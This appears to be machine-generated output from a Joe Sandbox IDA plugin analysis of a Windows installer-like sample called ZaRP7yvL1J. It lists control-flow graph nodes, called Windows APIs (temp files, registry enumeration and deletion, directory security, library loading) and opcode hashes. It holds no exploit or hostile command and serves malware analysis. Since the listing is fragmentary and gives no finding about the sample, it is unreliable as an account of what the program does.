                                                                                                            control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-678247507
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                              • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                            • SetFilePointer.KERNELBASE(00165A3B,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                            • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                            • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
